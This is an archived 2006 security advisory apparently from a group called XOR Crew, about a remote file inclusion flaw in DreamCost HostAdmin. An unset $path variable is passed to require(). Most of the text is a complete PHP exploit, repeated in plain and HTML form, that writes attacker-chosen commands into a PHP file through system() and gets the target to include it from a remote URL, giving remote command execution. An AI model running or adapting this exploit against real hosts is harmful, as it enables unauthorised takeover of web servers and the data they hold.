`------=_Part_3553_5345776.1140054808635
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
XOR Crew :: Security Advisory =20
2/11/2006
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
HostAdmin - Remote Command Execution Vulnerability
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
http://www.xorcrew.net/
http://www.xorcrew.net/ReZEN
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
:: Summary
Vendor : DreamCost
Vendor Site : http://www.dreamcost.com/
Product(s) : HostAdmin - Automated Hosting Suite
Version(s) : All
Severity : Medium/High
Impact : Remote Command Execution
Release Date : 2/11/2006
Credits : ReZEN (rezen (a) xorcrew (.) net)
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
I. Description
By creating a product that integrates with the major payment
processors, registrars,
and provisioning tools on the market, HostAdmin gives your hosting
company the power
to bill and activate hosting accounts in real-time, even while you
sleep at night!
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
II. Synopsis
There is a remote file inclusion vulnerability that allows for remote
command execution
in the index.php file. The bug is here on lines 5, 6, and 7:
require("setup.php");
require("functions.php");
require("db.conf");
require($path . "que.php");
require($path . "provisioning_manager.php");
require($path . "registrar_manager.php");
the $path variable is not set prior to being used in the require() function=
.
The vendor is no longer offering updates for this software.
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
Exploit code:
-----BEGIN-----
<?php
/*
HostAdmin Remote File Inclusion Exploit c0ded by ReZEN
Sh0uts: xorcrew.net, ajax, gml, #subterrain, My gf
url: http://www.xorcrew.net/ReZEN
*/
$cmd =3D $_POST["cmd"];
$turl =3D $_POST["turl"];
$hurl =3D $_POST["hurl"];
$form=3D "<form method=3D\"post\" action=3D\"".$PHP_SELF."\">"
."turl:<br><input type=3D\"text\" name=3D\"turl\" size=3D\"90\"
value=3D\"".$turl."\"><br>"
."hurl:<br><input type=3D\"text\" name=3D\"hurl\" size=3D\"90\"
value=3D\"".$hurl."\"><br>"
."cmd:<br><input type=3D\"text\" name=3D\"cmd\" size=3D\"90\"
value=3D\"".$cmd."\"><br>"
."<input type=3D\"submit\" value=3D\"Submit\" name=3D\"submit\">"
."</form><HR WIDTH=3D\"650\" ALIGN=3D\"LEFT\">";
if (!isset($_POST['submit']))
{
echo $form;
}else{
$file =3D fopen ("test.txt", "w+");
fwrite($file, "<?php system(\"echo ++BEGIN++\"); system(\"".$cmd."\");
system(\"echo ++END++\"); ?>");
fclose($file);
$file =3D fopen ($turl.$hurl, "r");
if (!$file) {
echo "<p>Unable to get output.\n";
exit;
}
echo $form;
while (!feof ($file)) {
$line .=3D fgets ($file, 1024)."<br>";
}
$tpos1 =3D strpos($line, "++BEGIN++");
$tpos2 =3D strpos($line, "++END++");
$tpos1 =3D $tpos1+strlen("++BEGIN++");
$tpos2 =3D $tpos2-$tpos1;
$output =3D substr($line, $tpos1, $tpos2);
echo $output;
}
?>
------END------
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
IV. Greets :>
All of xor, Infinity, stokhli, ajax, gml, cijfer, my beautiful girlfriend.
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
------=_Part_3553_5345776.1140054808635
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline
<pre>=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D<br>XOR Crew :: Security Advisory=
2/11/2006<br>=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D
<br>HostAdmin - Remote Command Execution Vulnerability<br>=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D<br><a href=3D"http://www.xorcrew.net/">http://www.xor=
crew.net/</a><br><a href=3D"http://www.xorcrew.net/ReZEN">
http://www.xorcrew.net/ReZEN</a><br>=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D<br=
><br>:: Summary<br><br> Vendor : DreamCost<br> Vendor Site=
: <a href=3D"http://www.dreamcost.com/">
http://www.dreamcost.com/</a><br> Product(s) : HostAdmin - Automate=
d Hosting Suite<br> Version(s) : All<br> Severity : Mediu=
m/High<br> Impact : Remote Command Execution<br> Release D=
ate : 2/11/2006
<br> Credits : ReZEN (rezen (a) xorcrew (.) net)<br><br>=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D<br><br>I. Description<br><br>By creating a p=
roduct that integrates with the major payment processors, registrars,=20
<br>and provisioning tools on the market, HostAdmin gives your hosting comp=
any the power <br>to bill and activate hosting accounts in real-time, even =
while you sleep at night!<br><br><br>=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
<br><br>II. Synopsis<br><br>There is a remote file inclusion vulnerability =
that allows for remote command execution<br>in the index.php file. The bug=
is here on lines 5, 6, and 7: <br><br>require("setup.php");<br>
require("functions.php");<br>require("db.conf");<br>req=
uire($path . "que.php");<br>require($path . "provisioning_ma=
nager.php");<br>require($path . "registrar_manager.php");
<br><br>the $path variable is not set prior to being used in the require() =
function.<br>The vendor is no longer offering updates for this software.<br=
><br>=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
<br><br>Exploit code:<br><br>-----BEGIN-----<br><br><?php<br>/*<br>HostA=
dmin Remote File Inclusion Exploit c0ded by ReZEN<br>Sh0uts: <a href=3D"htt=
p://xorcrew.net">xorcrew.net</a>, ajax, gml, #subterrain, My gf<br>url: =20
<a href=3D"http://www.xorcrew.net/ReZEN">http://www.xorcrew.net/ReZEN</a><b=
r>*/<br><br>$cmd =3D $_POST["cmd"];<br>$turl =3D $_POST["tur=
l"];<br>$hurl =3D $_POST["hurl"];<br><br>$form=3D "<=
form method=3D\"post\" action=3D\"".$PHP_SELF."\&q=
uot;>"
<br> ."turl:<br><input type=3D\"text\" name=3D\&=
quot;turl\" size=3D\"90\" value=3D\"".$turl."=
\"><br>"<br> ."hurl:<br><input type=3D\=
"text\" name=3D\"hurl\" size=3D\"90\" value=
=3D\"".$hurl."\"><br>"
<br> ."cmd:<br><input type=3D\"text\" name=3D\&q=
uot;cmd\" size=3D\"90\" value=3D\"".$cmd."\&q=
uot;><br>"<br> ."<input type=3D\"submit\"=
; value=3D\"Submit\" name=3D\"submit\">"
<br> ."</form><HR WIDTH=3D\"650\" ALIGN=3D\"=
;LEFT\">";<br><br>if (!isset($_POST['submit'])) <br>{<br><br>e=
cho $form;<br><br>}else{<br><br>$file =3D fopen ("test.txt", &quo=
t;w+");
<br><br>fwrite($file, "<?php system(\"echo ++BEGIN++\"); =
system(\"".$cmd."\"); <br>system(\"echo ++END++\&q=
uot;); ?>");<br>fclose($file);<br><br>$file =3D fopen ($turl.$hurl,=
"r");
<br>if (!$file) {<br> echo "<p>Unable to get output.\n";=
<br> exit;<br>}<br><br>echo $form;<br><br>while (!feof ($file)) {<br> =
$line .=3D fgets ($file, 1024)."<br>";<br> }<br>$tpos1 =
=3D strpos($line, "++BEGIN++");
<br>$tpos2 =3D strpos($line, "++END++");<br>$tpos1 =3D $tpos1+str=
len("++BEGIN++");<br>$tpos2 =3D $tpos2-$tpos1;<br>$output =3D sub=
str($line, $tpos1, $tpos2);<br>echo $output;<br><br>}<br>?><br><br><br>-=
-----END------
<br><br>=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D<br><br>IV. Greets :><br><b=
r>All of xor, Infinity, stokhli, ajax, gml, cijfer, my beautiful girlfriend=
.<br><br>=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
</pre>
------=_Part_3553_5345776.1140054808635--
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation